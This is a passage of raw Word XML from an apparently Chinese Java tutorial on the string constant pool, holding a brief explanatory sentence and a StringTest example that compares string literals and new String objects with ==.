          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7D4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>计算时间主要用于在字符串常量池中查找是否有内容相同对象的引用。不过，所以计算成本较低。</w:t>
      </w:r>
      <w:r w:rsidR="00B900A6" w:rsidRPr="005C7D4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>其内部实现为</w:t>
      </w:r>
      <w:r w:rsidR="00B900A6" w:rsidRPr="005C7D4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HashTable</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ab"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E546DB" w:rsidTr="00E546DB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>class</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> StringTest {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> test1() {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">String </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s1</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"abc"</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">String </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s2</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"abc"</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t>System.</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>out</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.println(</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s1</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> == </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s2</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> test2() {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">String </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s1</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> String(</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"abc"</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">String </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s2</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> String(</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"abc"</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t>System.</w:t>
            </w:r>
